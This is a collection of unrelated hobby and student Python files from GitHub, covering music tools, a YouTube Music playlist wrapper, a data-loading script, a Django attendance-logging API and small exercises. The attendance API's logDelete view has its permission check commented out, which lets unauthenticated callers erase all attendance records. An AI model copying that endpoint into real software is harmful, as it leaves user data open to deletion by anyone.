== '__main__':\r\n main()\r\n","repo_name":"shahaamirbader/Angle-Estimation-using-Detectron2-and-OpenCV","sub_path":"main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":9500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32119515613","text":"import mido\n\ndef convert_midi_to_text(midi_file_path):\n midi = mido.MidiFile(midi_file_path)\n text = \"\"\n\n for message in midi:\n if message.type == 'set_tempo':\n tempo = message.tempo\n text += f\"0 Tempo {tempo}\\n\"\n elif message.type == 'time_signature':\n numerator = message.numerator\n denominator = message.denominator\n metronome = message.clocks_per_click\n thirty_seconds = message.notated_32nd_notes_per_beat\n text += f\"0 TimeSig {numerator}/{denominator} {metronome} {thirty_seconds}\\n\"\n elif message.type == 'note_on':\n channel = message.channel + 1\n note = message.note\n velocity = message.velocity\n text += f\"{message.time} NoteOn ch={channel} n={note} v={velocity}\\n\"\n elif message.type == 'note_off':\n channel = message.channel + 1\n note = message.note\n velocity = message.velocity\n text += f\"{message.time} NoteOff ch={channel} n={note} v={velocity}\\n\"\n\n return text\n","repo_name":"AetherSonata/GPTmidi-UI","sub_path":"src/model/midi_to_text_converter.py","file_name":"midi_to_text_converter.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"30924792306","text":"from ytmusicapi import YTMusic\nfrom includes.const import *\nimport json\nfrom datetime import datetime\n\n# DEFAULT_IMG_URL_YOUTUBE = \"#\"\n\ndef youtube_music_auth(raw_header: str):\n return YTMusic.setup(headers_raw=raw_header)\n\nclass youtube_music_tasker:\n def __init__(self, auth_json:str):\n self.api=YTMusic(auth_json)\n\n # Return:\n # [\n # {\n # \"id\": \"playlistid1\",\n # \"title\": \"playlist_title1\",\n # \"thumbnail\": \"url_to_playlist1_1st_thumbnail\"\n # }, \n # {\n # \"id\": \"playlistid2\",\n # \"title\": \"playlist_title2\",\n # \"thumbnail\": \"url_to_playlist2_1st_thumbnail\"\n # }\n # ]\n #\n def show_playlist(self):\n list_of_playlist = []\n\n try:\n library_playlists = self.api.get_library_playlists(limit=50) # Hopefully, no one has 50+ playlists. \n for pl in library_playlists:\n # Only showing non-empty well-formed playlists\n if 'count' in pl and int(pl['count'])>0 and 'playlistId' in pl and 'title' in pl and 'thumbnails' in pl:\n playlist = {}\n playlist['id']=pl['playlistId']\n playlist['title']=pl['title']\n if len(pl['thumbnails'])>0:\n playlist['thumbnail']=pl['thumbnails'][0]['url']\n else:\n playlist['thumbnail']=DEFAULT_IMG_URL\n list_of_playlist.append(playlist)\n except Exception as e:\n print(\"Unexpected Error in show_playlist:\", e)\n \n return json.dumps(list_of_playlist)\n\n # Return:\n # [\n # {\n # \"title\": \"name\",\n # \"artist\": \"someone\",\n # \"album\": \"the album\"\n # }, \n # {\n # \"title\": \"name\",\n # \"artist\": \"any\",\n # \"album\": \"any\"\n # }\n # ]\n #\n def show_song_in_playlist(self, playlist_id:str):\n list_of_song = []\n\n try:\n pl_detail = self.api.get_playlist(playlistId=playlist_id)\n if 'tracks' in pl_detail:\n for track in pl_detail['tracks']:\n if 'title' in track:\n new_track = {'title':track['title'], 'artist':'any', 'album':'any'}\n if 'artists' in track and len(track['artists'])>0:\n new_track['artist'] = track['artists'][0]['name']\n if 'album' in track and track['album'] != None and 'name' in track['album']:\n new_track['album'] = track['album']['name']\n list_of_song.append(new_track)\n except Exception as e:\n print(\"Unexpected Error in show_song_in_playlist:\", e)\n return json.dumps(list_of_song)\n\n\n # access: 'PRIVATE', 'PUBLIC', 'UNLISTED'\n # Return: A tuple of (create_status, playlist_id, add_status)\n def new_playlist(self, playlist_name:str, desc:str = \"A playlist created by PlaySync on \"+str(datetime.today().strftime('%Y-%m-%d')), access: str = 'PRIVATE', tracks=[]):\n try:\n playlist_id = self.api.create_playlist(title=playlist_name, description=desc, privacy_status=access)\n if type(playlist_id) == str: # It is an id\n if len(tracks)>0:\n status = self.api.add_playlist_items(playlist_id, tracks)\n return (0, playlist_id, status) # Creation successful, add status attached\n else:\n return (0, playlist_id, \"NULL\") # Creation successful, didn't add\n else: # Status message, means error in creation\n return (-1, 0, playlist_id)\n except Exception as e:\n print(\"Unexpected Error in new_playlist:\", e)\n return (-2, 0, e) # Didn't crash gracefully\n\n def search_song(self, song_title:str, song_artist:str=\"\", song_misc:str=\"\"):\n song_list = []\n try:\n search_results = self.api.search(query = song_title + song_artist + song_misc, limit=10)\n for song_found in search_results:\n if(song_found['resultType'] in ['song','video']):\n new_song = {'id':song_found['videoId'], 'title': song_found['title'], 'artist':'None', 'album':'None', 'duration':'Unknown'}\n if len(song_found['artists'])>0:\n new_song['artist']=song_found['artists'][0]['name']\n if 'album' in song_found:\n new_song['artist']=song_found['album']['name']\n if 'duration' in song_found:\n new_song['duration']=song_found['duration']\n song_list.append(new_song)\n except Exception as e:\n print(\"Unexpected Error in search_song:\", e)\n \n return json.dumps(song_list)\n\n def add_songs(self, playlist_id:str, tracks=[]):\n try:\n status = self.api.add_playlist_items(playlist_id, tracks)\n return (0, playlist_id, status) # Creation successful, add status attached\n except Exception as e:\n print(\"Unexpected Error in add_songs:\", e)\n return (-2, 0, 0) # Didn't crash gracefully\n \n def del_songs(self, playlist_id:str, tracks=[]):\n try:\n if len(tracks) > 0:\n status = self.api.remove_playlist_items(playlist_id, videos=tracks)\n return status\n except Exception as e:\n return \"UNCAUGHT ERROR\"+str(e)\n return \"NULL\"\n\n def del_playlist(self, playlist_id:str):\n try:\n status = self.api.delete_playlist(playlist_id)\n return status\n except Exception as e:\n return \"UNCAUGHT ERROR\"+str(e)","repo_name":"PlaySync/PlaySync","sub_path":"code/flask/api/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"22989553304","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^users/(?P<id>\\d+)$', views.info, name='info'),\n\turl(r'^create$', views.create, name='create'),\n\turl(r'^fav/(?P<id>\\d+)$', views.fav, name='fav'),\n\turl(r'^delelte/(?P<id>\\d+)$', views.delete, name='delete'),\n\n\n]","repo_name":"salazarlg24/Quotes","sub_path":"apps/quoteapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36893665585","text":"#\n# name: loading-describing-data.py\nname='loading-describing-data'\ndescription='Loading and describing the data'\n# version: 0.1\nversion='0.1'\n# date last revision: 26.10.2021\ndate_last_revision='26.10.2021'\n# author: spigae\nauthor='spigae'\n# webpage: https://github.com/spigae\n#\n# importing libraries\n# os\nimport os\n# time\nimport time\n# platform\nimport platform\n# io\nimport io\n# pandas\nimport pandas as pd\n# import numpy\nimport numpy as np\n#\n# declaring the files of input and output\nin0='../data/concrete_data/Concrete_Data.xls'\n# description and info about the dataframe\nout1='description-data.csv'\nout2='info-data.csv'\n#\n# to calculate elapsed time\nstart_time = time.time()\n#\nprint(' ')\nprint('',name)\nprint('',description)\nprint(' version: ',version)\nprint(' date last revision: ',date_last_revision)\nprint(' ')\nprint(' Python version:', platform.python_version())\nprint(' ')\nprint(' author: ',author)\nprint(' input: ',in0)\nprint(' ')\nprint(' output 1: ',out1)\nprint(' output 2: ',out2)\nprint(' ')\nprint(' ... script running')\nprint(' ')\n#\n#---\n# function for reading the dataframe\n#---\ndef read_df_excel(filename):\n #\n df0 = pd.read_excel(in0,sheet_name='Sheet1')\n #\n return df0\n#---\n# function for describing the dataframe\n#---\ndef describe_df():\n desc = df0.describe(include='all').T\n #desc = df0.describe(include='all')\n desc.fillna('NA', inplace=True)\n #\n nrows = df0.shape[0]\n ncols = df0.shape[1] \n return desc,nrows,ncols\n#---\n# function for getting information about the dataframe\n#---\ndef info_df():\n # from :\n # https://stackoverflow.com/questions/59596498/how-to-combine-python-dataframes-info-output-with-unique-count-list\n info = []\n for col in df0.columns:\n nonNull = len(df0) - np.sum(pd.isna(df0[col]))\n null = np.sum(pd.isna(df0[col]))\n unique = df0[col].nunique()\n colType = str(df0[col].dtype)\n\n info.append([col, nonNull, null, unique, colType])\n info = pd.DataFrame(info) \n info.columns = ['colName','non-null values', 'null values', 'unique', 'dtype']\n return info\n#\n#-----\n# main\n#-----\n#\n# reading dataframe\ndf0 = read_df_excel(input)\n# describing the dataframe\ndesc,nrows,ncols = describe_df()\ndesc.to_csv(out1, index=True)\nprint(' This dataframe is made of')\nprint(' # rows:',nrows)\nprint(' # columns:',ncols)\n# information about the dataframe\ninfo = info_df()\ninfo.to_csv(out2, index=False)\n#\n# elapsed time for the calculations\nend_time = time.time()\nelapsed_time = end_time - start_time\nformatted_time = \"{:.2f}\".format(elapsed_time)\nprint(' ')\nprint(' Elapsed time:', formatted_time, 's')\n#\nprint(' ')\nprint(' Done!')\nprint(' ')\nprint(' Please see the output files')\nprint(' for further information')\nprint(' ')\n","repo_name":"spigae/linear-regression","sub_path":"OLS/loading-describing-data.py","file_name":"loading-describing-data.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34892397114","text":"import random\nfrom src.MarkovChain import Markov_Chain\nfrom src.FileHandler import parse_midi_file\nclass Melody_Generator:\n def __init__(self, notes_range, duration_range, start_note = 0, start_duration = 0):\n self.notes_markov_chain = Markov_Chain(notes_range, start_note)\n self.duration_markov_chain = Markov_Chain(duration_range, start_duration)\n \n def index_of_closest_element_in_list(self, list, x):\n return min(range(len(list)), key=lambda i: abs(list[i] - x))\n \n def return_next_note(self):\n random_number = random.uniform(\n 0, \n max(self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note])\n )\n index_of_closest = self.index_of_closest_element_in_list(\n self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note], \n random_number\n )\n while (sum(self.notes_markov_chain.probability_matrix[index_of_closest]) == 0):\n random_number = random.uniform(0, max(self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note]))\n index_of_closest = self.index_of_closest_element_in_list(\n self.notes_markov_chain.probability_matrix[self.notes_markov_chain.current_note], \n random_number\n )\n return index_of_closest\n \n @staticmethod\n def learn(paths_list, markov_chain: Markov_Chain):\n for p in paths_list:\n print(\"Otwieram: \" + p)\n song = parse_midi_file(p)\n markov_chain.learn(song.pitch)\n \n \n @staticmethod\n def random_starting_point(markov_chain: Markov_Chain):\n # randomint(a, b) generate random number from interval a <= x <= b\n starting_point = random.randint(0, markov_chain.matrix_size - 1)\n while(sum(markov_chain.probability_matrix[starting_point]) == 0):\n starting_point = random.randint(0, markov_chain.matrix_size - 1)\n return starting_point\n\n @staticmethod\n def check_row_if_zero(number, markov_chain: Markov_Chain):\n if sum(markov_chain.probability_matrix[number]) == 0:\n return -1\n return 1","repo_name":"michalpawlowicz/Melody-Generator","sub_path":"src/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21125232601","text":"from django.shortcuts import render\nfrom django.db.models.aggregates import Max\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status, generics\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\n\nfrom users.models import User\nfrom .models import Attendance, Logs\nimport datetime, time\n\nfrom io import StringIO\nfrom django.http import HttpResponse\nfrom xlsxwriter.workbook import Workbook\nimport openpyxl\n\n# Create your views here.\n\nclass login(APIView):\n \"\"\"\n User day-in login\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n except:\n user = User.objects.get(username = request.user.username)\n start_minutes = user.start_time.hour*60 + user.start_time.minute\n end_minutes = user.end_time.hour*60 + user.end_time.minute\n ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n if ctime >= start_minutes:\n attendance = Attendance(user = user, date = datetime.date.today(), \n attendance_status = 'WORKING', working_window = end_minutes - start_minutes)\n attendance.save()\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n log = Logs(logid = attendance, type = 1)\n log.save()\n resp = {'message': 'Hello, ' + request.user.first_name}\n return Response(resp)\n else:\n resp = {'message': 'Please login on or after ' + user.start_time}\n return Response(resp)\n else:\n resp = {'message': 'You are already logged in.'}\n return Response(resp)\n\nclass logout(APIView):\n \"\"\"\n User day-out login\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n except:\n resp = {'message': 'Please login before you logout'}\n return Response(resp)\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n user = User.objects.get(username = request.user.username)\n start_minutes = user.start_time.hour*60 + user.start_time.minute\n end_minutes = user.end_time.hour*60 + user.end_time.minute\n ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n if attendance.is_completed == True:\n resp = {'message': 'Logged out for the day.'}\n return Response(resp)\n if ctime >= end_minutes:\n minutes = 0\n lastactive = Logs.objects.filter(logid__user__pk = request.user.id).order_by('id').last()\n ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n ptime = lastactive.time.hour*60 + lastactive.time.minute\n minutes = ctime - ptime\n minutes += int(lastactive.active_time)\n attendance.total_logouts += 1\n attendance.active_window = minutes\n start_minutes = user.start_time.hour*60 + user.start_time.minute\n end_minutes = user.end_time.hour*60 + user.end_time.minute\n if minutes > end_minutes - start_minutes:\n attendance.attendance_status = 'PRESENT'\n else:\n attendance.attendance_status = 'ABSENT' \n attendance.is_completed = True \n attendance.save() \n log = Logs(logid = attendance, type = 0, active_time = minutes)\n log.save()\n resp = {'message': 'Have a nice time, ' + request.user.first_name}\n return Response(resp)\n else:\n resp = {'message': 'Please logout on or after ' + str(user.end_time)}\n return Response(resp)\n \n\nclass iLogin(APIView):\n \"\"\"\n Intermediate login\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n except:\n resp = {'message': 'Your workday has not started. Please login.'}\n return Response(resp)\n else:\n # user = User.objects.get(username = request.user.username)\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n if attendance.is_completed == True:\n resp = {'message': 'Logged out for the day.'}\n return Response(resp)\n logs = Logs.objects.filter(logid__user__pk = request.user.id).order_by('id').last()\n if logs.type == 0:\n log = Logs(logid = attendance, type = 1)\n log.save()\n resp = {'message': 'Welcome back, ' + request.user.first_name}\n attendance.attendance_status = 'WORKING'\n attendance.total_logins += 1\n attendance.save()\n return Response(resp)\n else:\n resp = {'message': 'You are already logged in, ' + request.user.first_name}\n return Response(resp)\n\nclass iLogout(APIView):\n \"\"\"\n Intermediate logout\n \"\"\"\n permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n except:\n resp = {'message': 'Your workday has not started. Please login.'}\n return Response(resp)\n else:\n # user = User.objects.get(username = request.user.username)\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n if attendance.is_completed == True:\n resp = {'message': 'Logged out for the day.'}\n return Response(resp)\n logs = Logs.objects.filter(logid__user__pk = request.user.id).order_by('id').last()\n if logs.type == 1:\n minutes = 0\n ctime = (time.gmtime().tm_hour+5)*60 + time.gmtime().tm_min + 30\n ptime = logs.time.hour*60 + logs.time.minute\n minutes = ctime - ptime\n minutes += int(logs.active_time)\n attendance.total_logouts += 1\n attendance.active_window = minutes\n attendance.attendance_status = 'BREAK'\n attendance.save()\n log = Logs(logid = attendance, type = 0)\n log.save()\n resp = {'message': 'Take a break, ' + request.user.first_name}\n return Response(resp)\n else:\n resp = {'message': 'You are already in break-time, ' + request.user.first_name}\n return Response(resp)\n\nclass userLogs(generics.ListAPIView):\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request, format=None):\n \"\"\"\n This view should return a list of all the logs\n for the currently authenticated user.\n \"\"\"\n date = self.request.GET['date']\n if date is None:\n date = datetime.date.today()\n else:\n date = datetime.datetime.strptime(date, '%d-%m-%Y')\n user = self.request.user.id\n try:\n attendance = Attendance.objects.get(user__pk = request.user.id, date = date)\n userDetails = {'User ID': attendance.user.id, 'No of logins':attendance.total_logins,\n 'No of logouts':attendance.total_logouts, \n 'Final status':attendance.attendance_status,\n 'Fixed start time':attendance.user.start_time,\n 'Fixed end time':attendance.user.end_time,\n 'Working window': attendance.working_window/60,\n 'Cummulative login session': attendance.active_window/60\n }\n\n login = Logs.objects.filter(logid__user__pk=user, logid__date = date, type = True).values_list('time')\n logout = Logs.objects.filter(logid__user__pk=user, logid__date = date, type = False).values_list('time')\n login_list = []\n for x in range(len(login)):\n login_list.append(login[x][0])\n logout_list = []\n for x in range(len(logout)):\n logout_list.append(logout[x][0])\n log_list = {'user details': userDetails, 'login list': login_list, 'logout list':logout_list}\n\n return Response(log_list)\n except:\n resp = {'message': f\"No data for {date.strftime('%d-%m-%Y')} found.\"}\n return Response(resp)\n\nclass allLogs(APIView):\n \"\"\"\n All user logs\n \"\"\"\n permission_classes = [IsAdminUser]\n\n def get(self, request, format=None):\n \"\"\"\n This view should return a list of all the logs\n for the currently authenticated user.\n \"\"\"\n date = self.request.GET['date']\n if date is None:\n date = datetime.date.today()\n else:\n date = datetime.datetime.strptime(date, '%d-%m-%Y')\n try:\n all_attendance = Attendance.objects.filter(date = date)\n log_list = {}\n for attendance in all_attendance:\n userDetails = {'User ID': attendance.user.id, 'No of logins':attendance.total_logins,\n 'No of logouts':attendance.total_logouts, \n 'Final status':attendance.attendance_status,\n 'Fixed start time':attendance.user.start_time,\n 'Fixed end time':attendance.user.end_time,\n 'Working window': attendance.working_window/60,\n 'Cummulative login session': attendance.active_window/60\n }\n\n login = Logs.objects.filter(logid__user__pk=attendance.user.id, logid__date = date, type = True).values_list('time')\n logout = Logs.objects.filter(logid__user__pk=attendance.user.id, logid__date = date, type = False).values_list('time')\n login_list = []\n for x in range(len(login)):\n login_list.append(login[x][0])\n logout_list = []\n for x in range(len(logout)):\n logout_list.append(logout[x][0])\n # log_list = {attendance.user.id : {'user details': userDetails, 'login list': login_list, 'logout list':logout_list}}\n log_list.update({attendance.user.id : {'user details': userDetails, 'login list': login_list, 'logout list':logout_list}})\n return Response(log_list)\n except:\n resp = {'message': f\"No data for {date.strftime('%d-%m-%Y')} found.\"}\n return Response(resp)\n\nclass logDelete(APIView):\n \"\"\"\n Clear Attendance and Logs tables\n \"\"\"\n # permission_classes = [IsAuthenticated]\n\n def post(self, request, format=None):\n Attendance.objects.all().delete()\n Logs.objects.all().delete()\n resp = {'message': 'Flushed Logs and Attendance records.'}\n return Response(resp)\n\nclass changeWW(APIView):\n \"\"\"\n View to change start_time and end_time\n \"\"\"\n permission_classes = [IsAuthenticated]\n \n def post(self, request, format=None): \n try:\n start = datetime.datetime.strptime(self.request.GET['start'], '%H:%M:%S')\n end = datetime.datetime.strptime(self.request.GET['end'], '%H:%M:%S')\n except:\n resp = {'message': 'start_time and end_time parameters not found.'}\n return Response(resp)\n else:\n user = User.objects.get(pk = request.user.id)\n user.start_time = start\n user.end_time = end\n user.save()\n start_minutes = start.hour*60 + start.minute\n end_minutes = end.hour*60 + end.minute\n attendance = Attendance.objects.get(user__pk = request.user.id, date = datetime.date.today())\n attendance.working_window = end_minutes - start_minutes\n attendance.save()\n resp = {'message': 'Time window updated.'}\n return Response(resp)\n\nclass downloadReport(APIView):\n \"\"\"\n View to download login session report in excel format\n \"\"\"\n permission_classes = [IsAdminUser]\n \n def get(self, request, format=None): \n date = self.request.GET['date']\n if date is None:\n date = datetime.date.today()\n else:\n date = datetime.datetime.strptime(date, '%d-%m-%Y')\n try:\n all_attendance = Attendance.objects.filter(date = date)\n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = f\"attachment; filename={self.request.GET['date']}.xlsx\"\n book = Workbook(response, {'in_memory': True})\n sheet = book.add_worksheet('Logs') \n except:\n resp = {'message': f\"No data for {date.strftime('%d-%m-%Y')} found.\"}\n return Response(resp)\n else:\n headlist = ['User ID', 'No of logins', 'No of logouts', 'Final status', 'Fixed start time', 'Fixed end time', 'Working window', 'Cummulative login session']\n for x in range(len(headlist)):\n sheet.write(0, x, headlist[x])\n\n row = 1\n for attendance in all_attendance:\n userDetails = {'User ID': attendance.user.id, 'No of logins':attendance.total_logins,\n 'No of logouts':attendance.total_logouts, \n 'Final status':attendance.attendance_status,\n 'Fixed start time':attendance.user.start_time,\n 'Fixed end time':attendance.user.end_time,\n 'Working window': attendance.working_window/60,\n 'Cummulative login session': attendance.active_window/60\n }\n col = 0\n for keys in userDetails:\n sheet.write(row, col, userDetails[keys])\n col += 1\n row += 1\n book.close()\n return response\n\nclass uploadWW(APIView):\n \"\"\"\n View to bulk upload user login and logout times\n \"\"\"\n permission_classes = [IsAdminUser]\n \n def get(self, request, format=None): \n response = HttpResponse(content_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')\n response['Content-Disposition'] = \"attachment; filename=upload.xlsx\"\n book = Workbook(response, {'in_memory': True})\n sheet = book.add_worksheet('Logs') \n\n headlist = ['User ID', 'Start time', 'End time']\n for x in range(len(headlist)):\n sheet.write(0, x, headlist[x])\n book.close()\n return response \n\n def post(self, request, format=None): \n \n excel_file = request.FILES[\"excel_file\"]\n\n # you may put validations here to check extension or file size\n\n wb = openpyxl.load_workbook(excel_file)\n\n # getting a particular sheet by name out of many sheets\n worksheet = wb[\"Logs\"]\n # print(worksheet)\n\n excel_data = list()\n # iterating over the rows and\n # getting value from each cell in row\n cnt = 0\n message = {}\n valid = True\n for row in worksheet.iter_rows():\n row_data = list()\n if cnt == 0:\n row_cnt = 0\n for cell in row:\n if str(cell.value) != 'User ID' and row_cnt == 0:\n valid = False\n elif str(cell.value) != 'Start time' and row_cnt == 1:\n valid = False\n elif str(cell.value) != 'End time' and row_cnt == 2:\n valid = False\n row_cnt += 1\n elif cnt > 0 and valid == True:\n try:\n user = User.objects.get(pk = row[0].value)\n except:\n message.update({f'UserID {row[0].value}': 'User not available'})\n else:\n try:\n attendance = Attendance.objects.get(user__pk = row[0].value, date = datetime.date.today())\n except:\n pass\n row_cnt = 0\n for cell in row:\n row_data.append(str(cell.value))\n if row_cnt == 1:\n start = datetime.datetime.strptime(str(cell.value), '%H:%M:%S')\n user.start_time = start\n start_minutes = start.hour*60 + start.minute\n elif row_cnt == 2:\n end = datetime.datetime.strptime(str(cell.value), '%H:%M:%S')\n user.end_time = end\n end_minutes = end.hour*60 + end.minute\n user.save()\n attendance.working_window = end_minutes - start_minutes\n attendance.save() \n message.update({f'User{row[0].value}': 'Time window updated.'}) \n row_cnt += 1 \n else:\n resp = {'message': 'Provide data in right'}\n return Response(resp)\n excel_data.append(row_data)\n cnt += 1\n print(excel_data)\n message.update({'message': 'Upload successful'})\n return Response(message)","repo_name":"raymond-irudayaraj/corp_attendance_management","sub_path":"logs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5696651669","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 2 17:53:15 2022\r\n\r\n@author: henrique buzzi\r\n\"\"\"\r\n## Entradas\r\nx = 3 #Número de alunos mínimos presentes no horário da aula\r\ntempoChegada = [-2,-1,0,1,2] #Vetor com os tempos de chegada de cada aluno\r\n\r\n##Processamento\r\nfor chegada in tempoChegada: #Loop que passa por cada tempo de chegada\r\n if(chegada>=0): #Se o tempo de chegada for maior ou igual a zero, o aluno estava presente no horário de começar a aula\r\n x-=1 #Diminui em 1 o número de alunos necessários para garantir a Aula normal\r\n\r\nif(x<=0): #Se o número de alunos necessários tiver sido atingido ou até superado\r\n print('Aula Normal') #Aula normal\r\nelse: #Se não atingiu o número necessário\r\n print('Aula Cancelada') #Aula cancelada","repo_name":"h-buzzi/desafio-warren","sub_path":"desafio-2/desafio-2.py","file_name":"desafio-2.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8029252741","text":"from wordfreq import zipf_frequency\n\nfiltered = open(\"filtered.txt\", \"w\")\nnon_filtered = open(\"non_filtered.txt\", \"w\")\n\n\nwith open(\"swe_wordlist_5.txt\") as file:\n words = file.readlines()\n words = [line.rstrip() for line in words]\n for word in words:\n if zipf_frequency(word, 'sv') >= 3:\n filtered.write(word + \"\\n\")\n else:\n non_filtered.write(word + \"\\n\")\n\nfiltered.close()\nnon_filtered.close()\n","repo_name":"himynameisjonas/ordsnille","sub_path":"scraper/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"23660966539","text":"import json\nimport sqlite3\nimport flask\n\n\ndb_file = r'fxh.db'\n\n\"\"\"\n表结构\n (id int, dataID int, forumID int, webName text, forumName text,\n topicID text, topicTitle text,\ttopicLink text, author text,\n pubTime text, authorLink text, replyNum int, viewNum int,\n lastReplier text, lastReplyTime text, lastReplierLink text, \n topicContent text, spiderDate text, spiderTime text, \n SYSspiderTime text, mediaType text, Dlevel int, isManu int,\n DTopicKind int, effectIndex int, DlevelKey text,\talexa int,\n remark text,\txid int)''') \n\n\"\"\"\n#媒体类型\ndef CountByMediaType():\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n c.execute('SELECT mediaType, count(ID) as num FROM articles group by mediaType')\n rs = c.fetchall()\n conn.close()\n return(json.dumps(rs))\n\nCountByMediaType()\n\n#媒体名称\ndef CountByWebName():\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n c.execute('SELECT webName, count(ID) as num FROM articles group by webName order by count(ID) desc limit 30')\n rs = c.fetchall()\n conn.close()\n return(json.dumps(rs))\n\n#时间序列\ndef CountByDate():\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n c.execute('SELECT date(pubTime), count(ID) as num FROM articles group by date(pubTime) order by date(pubTime) ')\n rs = c.fetchall()\n conn.close()\n return(json.dumps(rs))\n\nCountByDate()\n\n\n\ndef getArticles(currPage=0, pageSize=10):\n conn = sqlite3.connect(db_file)\n c = conn.cursor()\n \n #获得所有记录总数\n \n c.execute('SELECT count(*) FROM articles')\n rs = c.fetchone()\n \n rowsCount = rs[0] \n #print(rowsCount) \n \n c.execute('SELECT ID,mediaType,webName,topicTitle,author,topicLink,pubTime,DtopicKind,viewNum,replyNum FROM articles limit ' + str(pageSize) + ' offset ' + str((currPage -1)*pageSize))\n rs = c.fetchall()\n \n \n data = []\n for r in rs: \n d = {}\n d['id'] = r[0]\n d['mediaType'] = r[1]\n d['webName'] = r[2]\n d['topicTitle'] = r[3]\n d['author'] = r[4] \n d['topicLink'] = r[5]\n d['pubTime'] = r[6]\n d['DtopicKind'] = r[7]\n d['viewNum'] = r[8]\n d['replyNum'] = r[9]\n \n \n data.append(d)\n conn.close()\n\n #去掉前后的 []\n jsonStr = json.dumps(data)\n \n jsonStr = '{\"total\":' + str(rowsCount) + ',\"rows\":' + jsonStr + '}'; \n \n return jsonStr\n #return jsonStr[1:-1]\n \n #return rs\n #return(json.dumps(rs))\n\n\ngetArticles(1,2)\n\n","repo_name":"leiyu/fxh","sub_path":"dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9908457150","text":"#Kalind Ramnarayan\r\n#23 April 2014\r\n#voting simulation\r\n\r\nprint(\"Independent Electoral Commission\")\r\nprint(\"--------------------------------\")\r\n\r\nvotelist=[] #Create a list\r\nstring=input(\"Enter the names of parties (terminated by DONE):\\n\")\r\nwhile string!=\"DONE\": # add strings to the list\r\n votelist.append(string)\r\n string=input()\r\n \r\npartylist=[]\r\n\r\nfor i in votelist:\r\n if not i in partylist:\r\n partylist.append(i)\r\n \r\nx=partylist.sort()\r\n\r\nprint()\r\nprint(\"Vote counts:\")\r\ngap=\" \"\r\nfor i in partylist :\r\n print(i,gap*(9-len(i)),\"-\",votelist.count(i))\r\n","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/rmnkal001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15510269319","text":"from wtforms import form\r\nfrom werkzeug.utils import secure_filename\r\nimport Forms\r\nfrom config import *\r\nfrom flask import Flask, redirect, request, render_template, session, jsonify, flash\r\nfrom modelos import BD\r\nfrom modelos import Usuario, Repositorio, Imagen\r\nimport os\r\n\r\n#MIDDLEWARE PARA LA CREACIÓN DE DIRECTORIO PARA LAS IMÁGENES EN CASO DE NO EXISTIR#\r\ndef GenerarDirectorio():\r\n cwd = os.getcwd()\r\n ruta = os.path.join(cwd, 'public', 'assets/imagenes')\r\n\r\n if(os.path.isdir(ruta)):\r\n print(\"El directorio ya existe.\")\r\n else:\r\n print('Creando directorio...')\r\n os.mkdir(ruta)\r\n\r\n\r\n#INSTANCIA DE LA APLICACIÓN DE 